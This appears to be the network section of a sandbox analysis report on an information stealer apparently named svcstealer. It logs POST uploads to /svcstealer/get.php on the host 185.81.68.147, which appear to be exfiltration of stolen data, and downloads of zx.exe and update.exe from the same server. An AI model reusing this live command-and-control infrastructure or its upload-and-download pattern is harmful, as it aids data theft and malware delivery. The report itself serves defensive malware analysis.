Network Analysis
| IP Address | Status | Action |
|---|---|---|
| 185.81.68.147 | Active | Moloch |
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| No hosts contacted. | | |
POST 200 http://185.81.68.147/svcstealer/get.php
REQUEST
POST /svcstealer/get.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----7d82751e2bc0858
User-Agent: Mozilla/5.0
Host: 185.81.68.147
Content-Length: 14249
Cache-Control: no-cache
RESPONSE
HTTP/1.1 200 OK
Date: Sat, 18 Jan 2025 15:33:36 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
X-Powered-By: PHP/8.0.30
Set-Cookie: PHPSESSID=c6k2cmhc3nnnjp9ileqa1renmm; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Sat, 18 Jan 2025 15:33:36 GMT
Content-Length: 0
Content-Type: text/html; charset=UTF-8
POST 200 http://185.81.68.147/svcstealer/get.php
REQUEST
POST /svcstealer/get.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: 185.81.68.147
Content-Length: 34
Cache-Control: no-cache
Cookie: PHPSESSID=c6k2cmhc3nnnjp9ileqa1renmm
RESPONSE
HTTP/1.1 200 OK
Date: Sat, 18 Jan 2025 15:33:37 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
X-Powered-By: PHP/8.0.30
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Sat, 18 Jan 2025 15:33:37 GMT
Content-Length: 0
Content-Type: text/html; charset=UTF-8
POST 200 http://185.81.68.147/svcstealer/get.php
REQUEST
POST /svcstealer/get.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----7d82751e2bc0858
User-Agent: Mozilla/5.0
Host: 185.81.68.147
Content-Length: 24437
Cache-Control: no-cache
Cookie: PHPSESSID=c6k2cmhc3nnnjp9ileqa1renmm
RESPONSE
HTTP/1.1 200 OK
Date: Sat, 18 Jan 2025 15:33:37 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
X-Powered-By: PHP/8.0.30
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Sat, 18 Jan 2025 15:33:37 GMT
Content-Length: 0
Content-Type: text/html; charset=UTF-8
POST 200 http://185.81.68.147/svcstealer/get.php
REQUEST
POST /svcstealer/get.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: 185.81.68.147
Content-Length: 26
Cache-Control: no-cache
Cookie: PHPSESSID=c6k2cmhc3nnnjp9ileqa1renmm
RESPONSE
HTTP/1.1 200 OK
Date: Sat, 18 Jan 2025 15:33:38 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
X-Powered-By: PHP/8.0.30
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Sat, 18 Jan 2025 15:33:38 GMT
Content-Length: 66
Content-Type: text/html; charset=UTF-8
GET 200 http://185.81.68.147/zx.exe
REQUEST
GET /zx.exe HTTP/1.1
User-Agent: Mozilla/5.0
Host: 185.81.68.147
Cache-Control: no-cache
Cookie: PHPSESSID=c6k2cmhc3nnnjp9ileqa1renmm
RESPONSE
HTTP/1.1 200 OK
Date: Sat, 18 Jan 2025 15:33:38 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Fri, 17 Jan 2025 23:37:23 GMT
ETag: "5a4529-62bef647b0719"
Accept-Ranges: bytes
Content-Length: 5915945
Content-Type: application/x-msdownload
GET 200 http://185.81.68.147/update.exe
REQUEST
GET /update.exe HTTP/1.1
User-Agent: Mozilla/5.0
Host: 185.81.68.147
Cache-Control: no-cache
Cookie: PHPSESSID=c6k2cmhc3nnnjp9ileqa1renmm
RESPONSE
HTTP/1.1 200 OK
Date: Sat, 18 Jan 2025 15:33:52 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Fri, 17 Jan 2025 23:31:20 GMT
ETag: "be00-62bef4eda5aaa"
Accept-Ranges: bytes
Content-Length: 48640
Content-Type: application/x-msdownload
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
No Suricata TLS alerts.
Snort Alerts
No Snort alerts.